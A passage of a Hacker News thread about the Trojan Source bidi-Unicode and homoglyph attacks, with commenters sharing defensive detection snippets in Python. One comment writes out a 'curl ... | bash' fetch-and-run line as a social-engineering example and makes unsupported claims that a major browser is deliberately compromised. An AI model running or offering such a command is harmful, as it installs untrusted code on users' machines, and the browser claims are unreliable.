| thought of this type of attack. Maybe that's something I should
| pay attention to in the future.
| captaincrunch wrote:
| from the article, it's likely you'd not even notice - unless
| you pasted in an ascii only editor that doesn't allow
| anything other than plain old text.
| acdha wrote:
| > It'd also likely be pretty frustrating to end users if we
| were to highlight every single unicode character that looks
| like the latin alphabet.
|
| Have you tried something similar to what the browsers do where
| highlighting is only enabled when there are multiple scripts
| mixed within the same token? Source code seems like it would be
| harder since you have many tokens rather than just a single one
| as in a hostname, and I'd be curious how much legitimate usage
| mixes scripts for technical reasons because you have something
| like a language or framework convention that certain names
| start with a particular English-derived term.
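|
| A rough Python sketch of that per-token idea, in case it helps
| the discussion. Big assumption: the standard library has no
| Unicode Script property, so I approximate the script by the first
| word of each character's Unicode name. That is a heuristic only,
| and rough_script / mixed_script_tokens are made-up names.

```python
import re
import unicodedata


def rough_script(ch):
    """Approximate a letter's script by the first word of its Unicode name.

    Heuristic only: a real checker should use the Unicode Script property.
    """
    return unicodedata.name(ch, "UNKNOWN").split()[0]


def mixed_script_tokens(source):
    """Return (token, scripts) for word tokens whose letters span several scripts."""
    flagged = []
    for token in re.findall(r"\w+", source):
        scripts = {rough_script(ch) for ch in token if ch.isalpha()}
        if len(scripts) > 1:
            flagged.append((token, sorted(scripts)))
    return flagged


# The second identifier hides a Cyrillic U+0441 in place of the Latin "c".
sample = "if access_level == a\u0441cess_level: pass"
for token, scripts in mixed_script_tokens(sample):
    print(repr(token), scripts)
```

| Only the second identifier gets flagged; pure-Latin and
| pure-Cyrillic tokens pass, which is roughly the browser behaviour
| for hostnames.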
| robotmay wrote:
| So far we're just detecting individual bidi characters, but
| looking at characters in their greater context could be quite
| interesting. This would seem like quite a good use-case for
| machine-learning too, if you wanted to get super into it.
| jhgb wrote:
| > It'd also likely be pretty frustrating to end users if we
| were to highlight every single unicode character that looks
| like the latin alphabet.
|
| That actually strikes me as very desirable. (Especially in
| light of the old maxim that "programs must be written for
| people to read, and only incidentally for machines to
| execute".)
| grishka wrote:
| Latin C and Cyrillic С aren't the same letter. The latter is
| actually an "s". It would be a pain in the ass to work with
| strings if those Cyrillic letters that look like their Latin
| counterparts reused their codepoints. Imagine having to
| convert "M" to lowercase. Would that return "m" or "м"? Same
| for "H", "h" or "н"?
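|
| A quick Python illustration of the lowercase point, as a sketch.
| The helper name describe_lower is mine; the code points are the
| standard Latin and Cyrillic capitals.

```python
import unicodedata


def describe_lower(ch):
    """Return (name of ch, name of its lowercase form)."""
    return unicodedata.name(ch), unicodedata.name(ch.lower())


latin_m, cyrillic_em = "M", "\u041c"      # look-alike capitals
latin_h, cyrillic_en = "H", "\u041d"

# Separate code points, so each letter keeps its own case mapping.
print(latin_m == cyrillic_em)             # False
for ch in (latin_m, cyrillic_em, latin_h, cyrillic_en):
    upper_name, lower_name = describe_lower(ch)
    print(f"U+{ord(ch):04X} {upper_name} -> {lower_name}")
```

| Because the look-alikes have separate code points, lower() can
| give each one its own lowercase form, which a shared code point
| could not do.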
|
| And, actually, there was some really really cursed Soviet
| encoding that did this to save bits. The Russian railway
| company still uses it[1] to this day.
|
| [1] https://habr.com/ru/post/547820/
| gambas99 wrote:
| > there was some really really cursed Soviet encoding
|
| I know at least 10 stories that start like this
| jhgb wrote:
| > Latin C and Cyrillic С aren't the same letter.
|
| Well, as a moderately old Czech, I'm somewhat familiar with
| Cyrillic. They kind of used to force it on us in schools.
| wizzwizz4 wrote:
| Those Unicode characters aren't just there for show. They're
| part of real scripts that real people use; it would be
| annoying for people using those scripts.
| jhgb wrote:
| I'm fairly sure this could be arranged for. As in, if
| there's too many of them belonging to the character set of
| a particular language, then it's very likely that it's
| simply a text in that language. But random characters in
| the middle of ASCII identifiers are _probably_ not
| something that you want.
| robotmay wrote:
| Yeah I'm not opposed to adding highlighting to them, and
| we are investigating how to do it, but it was less clear-
| cut than the bidi characters (which are totally invisible
| when rendered). I think we'll want to make it a bit more
| configurable and probably a separate option to the one
| which highlights the bidi characters.
| R0b0t1 wrote:
| This type of attack isn't new. I can't recall the names but
| there are afair multiple C/C++ coding standards that limit
| everything to ASCII to avoid precisely this attack, but
| also others with visually similar but nonequivalent names.
| pas wrote:
| Yes, and they should be in well annotated/marked
| string/data sections, not in logic code.
| JoshTriplett wrote:
| Exactly. When we were adding support for non-ASCII
| identifiers to Rust, and thinking about homoglyphs and
| confusable characters, we needed to evaluate the tradeoffs
| between catching such characters and inconveniencing the
| speakers of various languages who want to write Rust in
| their language.
| Pxtl wrote:
| I skimmed the article but I didn't see any examples of this being
| exploited... Has anybody done a proof of concept on how Bidi can
| be used? I'm having trouble thinking of a line of code with a
| comment or literal where the code is legit forwards but malicious
| backwards.
| akersten wrote:
| It is wrong to call this a bug, this is a _feature_ of Unicode
| and very intentional. Whether we should have thought about that
| when allowing parsers to digest anything outside of ASCII is the
| real question. The answer is probably "IDEs and compilers should
| ignore character-direction codes when looking at source files."
| But that doesn't solve homoglyph attacks (and other undiscovered
| deception). What a fun can of worms. Who gets to solve it?
| zeepzeep wrote:
| > "IDEs and compilers should ignore character-direction codes
| when looking at source files."
|
| No, I think some people would disagree, Arabic coders for
| example. People just need to be aware of this when using
| unicode in their product.
| samus wrote:
| Editors and code views should definitely show when BiDi and
| other interesting Unicode features are used, just like they
| already do with spaces and zero-width whitespaces. These
| features should definitely work, but they are a liability if
| they can also be used to mislead human users.
|
| Compiler maintainers need to update the syntax rules to
| restrict free mixing of unicode characters. Similar
| restrictions were already adopted in domain names.
| kingcharles wrote:
| You're right - their headline is written for attention. It's an
| exploit of a feature.
|
| What I'm interested to know is whether there is any code
| already out there in the wild with this exploit in it? An
| intelligence service could have exploited this years ago
| without anyone noticing until now.
|
| Unicode is a pathway to all manner of hijinks, including as you
| say, homoglyph attacks. For instance, on some TLDs I can easily
| create two different domain names that render identically in
| the browser.
| comex wrote:
| > What I'm interested to know is whether there is any code
| already out there in the wild with this exploit in it?
|
| It's possible, but I doubt it. The paper mentions that Vim
| isn't vulnerable to the bidirectional attack. Not mentioned
| in the paper: neither is `less`, the pager, which is used by
| default for `git diff` and other Git commands. Nor are either
| of the first two terminals I tried, when `cat`ing the file
| without a pager.
|
| All of the aforementioned programs display the direction
| markers as either escape sequences highlighted in bright
| colors, or garbage characters, both of which stand out
| visually like a sore thumb. Now, that's more a sign of poor
| Unicode support in those programs than it is anything to
| their credit. But it does mean that this kind of attack is
| incredibly brittle, at least in any codebase where some
| people working on it are likely to be using Unix tools.
| There's a high chance the aberrant characters will be spotted
| at some point or other.
|
| And once spotted, it's self-evident that it's an attack. I
| suspect real attacks would try to be more subtle, introducing
| bugs that could pass as genuine mistakes, at least at first
| glance.
| kingcharles wrote:
| It's sad that large-scale exploitation of this is stopped
| only because many applications still have really poor
| Unicode support and would therefore make the changes human-
| visible.
| Groxx wrote:
| Coding editors also often show this kind of thing
| intentionally, as those characters are meaningful for
| interpretation purposes. Many of them are very UTF
| friendly, but they still show zero-width spaces as e.g.
| "<zwsp>" _on purpose_.
|
| They've also often shown non-printable ASCII control
| characters for basically forever. Null bytes and \bel and
| whatnot are very important despite being "invisible", and
| they've been around for decades.
| tetha wrote:
| I've been bitten by things like this from an entirely
| unexpected angle - messengers like teams and skype
| sometimes <helpfully> replace characters like "-" and " "
| with all manner of more readable unicode characters. More
| readable, until the YAML parser choked.
|
| Since that, I pretty much always run some variant of the
| gremlins plugin, which highlights pretty much all unicode
| spaces, dashes and other weird control symbols.
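|
| If you can't run an editor plugin, a few lines of Python give a
| similar check. This is only a sketch of the general idea, not
| how the gremlins plugin works: it flags non-ASCII characters
| whose Unicode general category is a space separator (Zs), a dash
| (Pd) or a format control (Cf). The name find_gremlins is
| hypothetical.

```python
import unicodedata

# Space separators, dash punctuation, and invisible format controls.
SUSPECT_CATEGORIES = {"Zs", "Pd", "Cf"}


def find_gremlins(text):
    """Return (line, column, code point, name) for suspicious non-ASCII characters."""
    hits = []
    for lineno, line in enumerate(text.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            if ord(ch) > 127 and unicodedata.category(ch) in SUSPECT_CATEGORIES:
                name = unicodedata.name(ch, "UNNAMED")
                hits.append((lineno, col, f"U+{ord(ch):04X}", name))
    return hits


# A YAML list where a chat client swapped "-" for an en dash and " " for a
# no-break space.
yaml_text = "items:\n  \u2013 first\n  -\u00a0second\n"
for hit in find_gremlins(yaml_text):
    print(*hit)
```

| Plain ASCII hyphens and spaces pass untouched, so this stays
| quiet on normal YAML.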
| Groxx wrote:
| Chat apps replacing (tm) with a horrifically large,
| poorly-rendered and off-colored "TM" and ruining The
| Joke(tm) is a major pet peeve of mine, yeah :| And even
| worse, it seems to be spreading, as each one blindly
| copies the horrible decisions of the others. I would
| disable all of those auto-replacements everywhere _if
| only I could disable all of those auto-replacements
| everywhere_.
| powersnail wrote:
| I think making these chars human visible is a feature.
| Most code editors have features like showing invisible
| characters, displaying some representation of white space
| characters, or highlighting control sequences.
|
| Because the editor is supposed to edit plain text, which
| means all characters must be editable. And something can
| only be editable if they are visible.
| josephcsible wrote:
| > Now, that's more a sign of poor Unicode support in those
| programs than it is anything to their credit.
|
| But that behavior is intentional. If you want, you could do
| "alias less='less -r'", and then it would behave the way
| you want, and you'd become vulnerable to this attack.
| comex wrote:
| -r makes it pass all control characters to the terminal.
| To quote less's man page:
|
| > Warning: when the -r option is used, less cannot keep
| track of the actual appearance of the screen (since this
| depends on how the screen responds to each type of
| control character).
|
| This is not the same as actually supporting (i.e. being
| able to keep track of the screen state for) bidirectional
| text that may legitimately use those characters.
|
| For that matter, the terminal may not support it either,
| as I mentioned.
|
| Though, today I learned there has been some effort in
| recent years to improve bidirectional text handling in
| terminals and terminal applications, generally:
|
| https://www.reddit.com/r/linux/comments/dn8uka/bidirectional...
| bmn__ wrote:
| > I can easily create two different domain names that render
| identically in the browser
|
| You can't (any more)1. That worked for a limited amount of
| time, then mitigations were put in place, and subsequently
| standardised as part of Unicode. Everyone who deals with
| implementations of Unicode is supposed to be knowledgeable
| about the security relevant aspects, you can bet that the
| people working on browsers definitely are.
| <http://p3rl.org/perlre#Script-Runs>
|
| 1 invitation to prove me wrong, I am on purpose leaning far
| out the metaphoric window and will gladly eat my words
| Amorymeltzer wrote:
| Came here to provide exactly that link (canonical:
| <https://perldoc.perl.org/perlre#Script-Runs>). For those
| who figured they'd skip over it, it's pretty neat IMO. Perl
| 5.28 (released 2018) added a new technique for matching
| patterns that aren't all from the same Unicode script, a
| "script run."
|
| >In most places a single word would never be written in
| multiple scripts, unless it is a spoofing attack. An
| infamous example, is
|
| >>paypal.com
|
| >Those letters could all be Latin (as in the example just
| above), or they could be all Cyrillic (except for the dot),
| or they could be a mixture of the two. In the case of an
| internet address the .com would be in Latin, And any
| Cyrillic ones would cause it to be a mixture, not a script
| run.
| kingcharles wrote:
| > You can't (any more)1.
|
| That was my understanding too, until this last week when I
| figured out you could.
|
| I'm pretty certain this: and this: are the same rendering,
| but are different Unicode, and I can register them both as
| domain names under some TLDs. Google displays them the same
| in their result pages too.
| bmn__ wrote:
| I examined closely and found both are exactly the same, a
| perfectly valid Latin script run and equivalent to the
| expression in escape notation
| "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}".
|     > perl -C -E'print "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}"' | hex
|     0000  74 68 69 73 3a  this:
|
| HN software likely ate the relevant details you wanted to
| show, can you please try again and use a notation that
| survives the HN filter?
| kingcharles wrote:
| Try this: https://kingcharles.one/unistrange.html
|
| When I created the file in Notepad it showed the hidden
| code, but I can register both those as valid domains and
| Google will show them identically in the SERPs, and
| Safari will show them both identically in the address
| bar. Chrome/Edge expands them in the address bar, but
| will render them the same in HTML. Have not tested on
| Firefox.
|
| If you View Source in Chrome it won't show the hidden
| code, but if you open the dev tools it will start to
| break.
| _3u10 wrote:
| Doesn't really matter. The major browser is intentionally
| security compromised, anyway.
|
| If you pay the maker of that browser they'll inject any
| links you want on most pages on the internet. Just give
| them the hash of the email / phone number of your target.
| It helps both economically and passing their security
| checks if you have more than a thousand victims you want to
| target.
|
| If you want to fool a developer just host it on a github
| page. If you want to fool anyone else, just do a decent
| clone of their page.
|
| If you want it to appear on most major news network sites,
| just pay $150 for a newswire.
|
| Think about it, if you crafted the right article, maybe
| about a fork of homebrew etc, and redirected to a github
| page with a link stating you needed to copy and paste
|
| curl http://github.com/asdkfjas/homebrew.sh | bash
|
| into their terminals how many would do it?
| KennyBlanken wrote:
| > You're right - their headline is written for attention
|
| That or just ignorance. Krebs has zero training or education
| in computer science or programming.
| josephcsible wrote:
| It's a feature for prose text, so programs like Word should
| support it. It's a security bug in anything designed to be
| parsed or interpreted by software, so programs like Visual
| Studio Code should refuse to honor it.
| asddubs wrote:
| or it should be confined to the marker of the string (i.e.
| the quotation marks) if you're doing syntax highlighting
| anyway
| hollerith wrote:
| Brilliant! Nobody would copy prose, then paste it into a code
| file or REPL without re-reading it after the paste.
| ximeng wrote:
| https://github.com/rust-lang/rust/issues/28979 plenty of
| discussion here on Unicode including homoglyph attacks. This is
| for Rust but has links to Go and Zig. The Unicode standard also
| has extensive discussion, for example
| https://unicode.org/reports/tr31/ and
| http://unicode.org/reports/tr39/ on identifiers and security.
|
| In general a multilayer solution is needed: compilers, linters,
| Unicode standard, merge tools, editors, and so on.
| rurban wrote:
| But they still don't get it right, they explicitly allow not
| identifiable Unicode identifiers. The C20 committee recently
| allowed also insecure identifiers, completely ignoring the
| Unicode identifier guidelines. They stated that nobody cares,
| everybody wants them and making them secure would need the
| entire Unicode database. Why do they allow noobs into such
| committees? What is needed are the normalization tables
| (tiny), the script list (tiny) and the two xid lists.
| estebank wrote:
| > they explicitly allow not identifiable Unicode
| identifiers. [...] They stated that nobody cares, everybody
| wants them and making them secure would need the entire
| Unicode database.
|
| Could you elaborate? rustc ships with the entire Unicode db
| and only allows idents with codepoints advertised by
| Unicode as allowed in idents.
|
| The closest to walking off the beaten path is a (still
| unmerged) parser recovery PR that accepts emojis as
| identifiers _if and only if_ a parse error would otherwise
| occur as a way to avoid knock down errors when someone
| tries to use them.
| Animats wrote:
| What's needed is to impose on programming languages, outside of
| comments, checks similar to the checks made for domain names.
|
| There is a draft standard for this.[1] It references RFC 5893
| and some other documents. Some of the rules:
|
| - All code points in a single label must be taken from the same
| script as determined by the Unicode Standard Annex #24: Script
| Names. Exceptions to this guideline are permissible for
| languages with established orthographies and conventions that
| require the commingled use of multiple scripts. (Like mixing
| kanji and romaji in Japanese.)
|
| - The "Bidi rules" of RFC 5893, which define allowed right to
| left and left to right modes, must be enforced. These are
| complicated, because of such things as the Arabic and Hebrew
| convention of right to left text with left to right numeric
| digits in numbers. But they are well-defined.
|
| - Only code points allowed by IDNA 2008 are allowed. This
| eliminates such things as the non-breaking zero width space,
| the expansion areas for future use, and such.
|
| The domain name people have been banging on this problem since
| 2003, and by now, there's a rough consensus of what to
| disallow. So start putting checks for that in compilers. If you
| find violations of those rules, it's more likely to be a typo
| than something useful, anyway.
|
| So that's a way out of this.
|
| [1] https://www.icann.org/en/system/files/files/draft-idn-
| guidel...
| varajelle wrote:
| > What's needed is to impose on programming languages,
| outside of comments, checks similar to the checks made for
| domain names.
|
| But this attack works by placing characters inside comments
| and strings. So these checks would not help preventing this
| particular attack.
| Animats wrote:
| They say that, but don't really justify that claim. That's
| more about string literals that do something other than
| just display, such as URLs.
| asddubs wrote:
| browsers have solved it for domain names. you could apply the
| same heuristics for not mixing e.g. cyrillic and non cyrillic
| in the same word/file
| a-dub wrote:
| wasn't there something a while back where people were triggering
| buffer overflows in terminal emulators with malicious (and
| invisible to the pretty printed eye) escape codes?
| banana_giraffe wrote:
| For anyone that wants to see the real code:
|
| https://gist.github.com/Q726kbXuN/3c978a63cb6de5168c017da4df...
|
| I've not seen one editor yet that doesn't at least hint there's a
| problem with syntax highlighting, if not just outright show
| nonsense.
| user2994cb wrote:
| I'm sure there are some creative uses in C-style comments for
| U+2215, Division Slash: /
| sqs wrote:
| Code search is helpful to see if any of your code contains these
| characters.
|
| A bunch of hits found across the top ~2M open-source
| repositories:
| https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...
|
| To triage, you probably want to first look at hits in code files
| (not JSON or Markdown, etc.):
|
| https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...
|
| You can set up a self-hosted instance of Sourcegraph to run this
| across all of your company's code: https://docs.sourcegraph.com/.
| mwcampbell wrote:
| > So you can use them in source code that appears innocuous to a
| human reviewer
|
| To a sighted human reviewer. If I'm not mistaken, a blind
| programmer using a screen reader would be immune to this trick.
| brazzy wrote:
| If the screen reader understands Bidi (which it needs to in
| order to support some languages), maybe not.
| afrcnc wrote:
| Duplicate: https://news.ycombinator.com/item?id=29061987
| Groxx wrote:
| Ehhhh... Interesting philosophically, and we might see a
| practical attack maybe eventually, but most source code editors
| and diff reviewers that I've encountered show all non-printable
| characters VERY visibly. Because they matter, and always have -
| "func asdf()" is very different from "func as<zwsp>df()". If I
| saw a pile of non-printable control characters intermixed in code
| in a diff, there's absolutely no way I'd allow that merge.
|
| IOCCC entries will absolutely become more fun though.
| lifthrasiir wrote:
| > IOCCC entries will absolutely become more fun though.
|
| IOCCC doesn't allow unescaped octets with high bit set [1], so
| even that's no go.
|
| [1] https://www.ioccc.org/2020/rules.txt (rule 13)
| GlitchMr wrote:
| Well, technically the rule only talks about entries that
| "fail to compile". An entry that still compiles is fine, see
| rule 12. In practice this means that Unicode abuse like this
| is only allowed in strings.
| lifthrasiir wrote:
| When the rule was originally introduced in 2001 [1] it was
| a total ban. It seems that the rule was slightly relaxed in
| 2013 [2], but I think it still massively discourages any
| octet >= 128 because there is no portable way to set the
| input encoding (like GCC `-finput-charset`, which is
| ignored by Clang AFAIK).
|
| [1] https://www.ioccc.org/2001/rules
|
| [2] https://www.ioccc.org/2013/rules.txt
| Groxx wrote:
| Aww. But also _of course_ they've already addressed this.
| saagarjha wrote:
| I am very curious which program abused this and forced the
| creation of that rule.
| lifthrasiir wrote:
| Probably 2000/briddlebane [1]. But it is more like a guard
| against compatibility issues.
|
| [1] https://www.ioccc.org/2000/briddlebane.c vs.
| https://www.ioccc.org/2000/briddlebane.orig.c
| [deleted]
| Jach wrote:
| I wouldn't be so sure about visibility since it seems most code
| editors and programming languages want to support more unicode,
| not less... One of my hobbies used to be annually running a
| regex search through the company's millions of lines of java to
| see how much of an increase there was in non-printable spaces
| (0x200b) in java method names or other symbols. Eclipse at
| least wouldn't show them by default, I don't remember
| IntelliJ's behavior, but most people wouldn't know they were
| there. I was aware of only one time when it impacted someone
| who typed in a whole identifier by sight but the reference
| included a 200b and they were stuck for a bit figuring out why
| things didn't work.
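|
| For the curious, a search like that can be sketched in Python as
| below. It is not the regex I actually ran; the character ranges
| and the names INVISIBLE, reveal and scan are picked for
| illustration, and they cover zero-width and bidi format characters
| rather than just 200b.

```python
import re

# Zero-width characters, directional marks, bidi controls, and the BOM.
INVISIBLE = re.compile("[\u200b-\u200f\u202a-\u202e\u2060-\u2069\ufeff]")


def reveal(text):
    """Replace each invisible character with a visible <U+XXXX> marker."""
    return INVISIBLE.sub(lambda m: f"<U+{ord(m.group()):04X}>", text)


def scan(source):
    """Return (line number, revealed line) for lines containing invisible characters."""
    return [
        (lineno, reveal(line))
        for lineno, line in enumerate(source.split("\n"), start=1)
        if INVISIBLE.search(line)
    ]


java_source = "void save() {}\nvoid lo\u200bad() {}\n"
for lineno, shown in scan(java_source):
    print(lineno, shown)
```

| A method name typed by sight never matches the one with the
| hidden 200b in it, which is exactly how that one person got
| stuck.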
|
| But I agree the trick (hard to call it an attack or even bug)
| is fun, in the same way as the earlier tricks of fake filename
| extensions. And terribly obvious, even with the limitations of
| default code viewers, and with no plausible deniability once
| caught, so it's pretty overblown for practical considerations.
| The intentionally introduced Linux kernel bugs from several
| months ago were far more significant a lesson for people to
| learn from, and they didn't rely on any unicode tricks but on
| much simpler tricks that were also somewhat plausibly deniable
| to chalk up to an oopsie.
| Groxx wrote:
| yeah, I've had an identifier or two like that in Ruby in the
| past :) always worth a few facepalm-riddled lols when sharing
| the final result with the rest of the team, especially since
| it often meant they copied the func from Stack Overflow or
| some equivalent.
|
| Most of what I've encountered though has been due to a _lack_
| of unicode support, and related growing pains in adopting
| full UTF-8. E.g. much of the Eclipse issues I saw were due to
| UTF-16 weirdness and stuff encoded in ShiftJIS or whatever
| flavor of Windows encoding you used, and all those garbled
| files due to missing magic-encoding-bytes in files. UTF-8
| support "completing" in tools largely cleaned all that up,
| since they detected the encoding, converted to UTF-8, and
| showed abnormal stuff as the abnormalities they were all
| along.
|
| I mean, that's probably because taking a deep look at
| supporting UTF-8 meant taking a deep look at many of their
| latent text bugs and finally fixing them, but it still
| happened around the same time, and "X editor now supports
| UTF-8" also marked a dramatic increase in "... and now shows
| <nbsp> explicitly!" and similar things.
| alanhaha wrote:
| Will this also fool formatter?
|
| Actually I think the format of the example in
| https://www.trojansource.codes/ is so strange that I would ask the
| committer to fix it.
| littlestymaar wrote:
| Something puzzles me: this kind of trick would definitely break
| syntax highlighting, wouldn't it?
| [deleted]
| sqs wrote:
| This issue has been raised before, such as at
| https://github.com/golang/go/issues/20209 (I was reminded of that
| by
| https://twitter.com/peter_szilagyi/status/145515080347229798...).
| There is some other interesting discussion there.
| dathinab wrote:
| I would say it's less that they discovered a new vulnerability and
| more that they put needed focus on a long-known problem.
|
| It's just that many people, while knowing the problem, never
| considered that it could be used in supply chain attacks.
___________________________________________________________________
(page generated 2021-11-01 23:02 UTC)